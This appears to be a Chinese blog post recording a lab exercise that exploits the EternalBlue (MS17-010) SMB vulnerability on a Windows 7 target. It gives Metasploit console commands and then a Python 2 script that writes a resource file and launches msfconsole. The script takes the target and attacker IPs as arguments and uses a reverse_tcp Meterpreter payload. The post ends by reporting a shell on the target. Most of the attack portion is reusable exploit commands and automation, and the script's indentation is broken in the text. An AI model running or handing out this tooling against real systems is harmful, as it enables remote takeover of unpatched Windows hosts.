1. 程式人生 > >記錄一次 先手工 再python指令碼 驗證永恆之藍ms17-10漏洞

記錄一次 先手工 再python指令碼 驗證永恆之藍ms17-10漏洞

檢視資料 ms17-10漏洞利用的步驟大致如下

開啟msf

use auxiliary/scanner/smb/smb_ms17_010

msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp

msf exploit(ms17_010_eternalblue) > set RHOST *******************

msf exploit(ms17_010_eternalblue) > set LHOST *******************

msf exploit(ms17_010_eternalblue) > exploit

嘗試用python指令碼 

使用sys 和os 模組

import sys

import os

print 'Metasploit executing the ms-17-010 vulnerability attack'#這句話的意思是正在實施MS17010漏洞的攻擊

def sds(config):

config=open('yhzl.rc','w')#首先我們來建立一個xxx.rc的檔案

#把你要使用到的模組和對應的引數寫入xxx.rc裡去

config.write('use exploit/windows/smb/ms17_010_eternalblue'

+"\n")

config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"\n")

config.write('set RHOST '+sys.argv[1]+"\n")

config.write('set LHOST '+sys.argv[2]+"\n")

config.write('exploit'+"\n")

sds('')

def main():

mg=os.system('msfconsole -r /root/yhzl.rc')#執行msfconsole -r 路徑/xxx.rc,就可以了

if __name__

== '__main__':

main()

本次實驗的攻擊機kali:192.168.88.118

win7靶機:192.168.88.133(開啟445共享服務)

首先對靶機進行一個初步掃描

nmap 192.168.88.133

開啟445埠

開啟metasploit  

設定相應payload 目的地址 本機地址 

執行

檢視相應靶機資訊

進入控制檯shell 檢視使用者

成功   

接下來嘗試 之前的指令碼 執行結果

執行 把靶機地址 和 攻擊機地址加在後面 ps:sys模組(用於接收資料)

成功

python程式分析: 建立了一個rc指令碼檔案用metasploit執行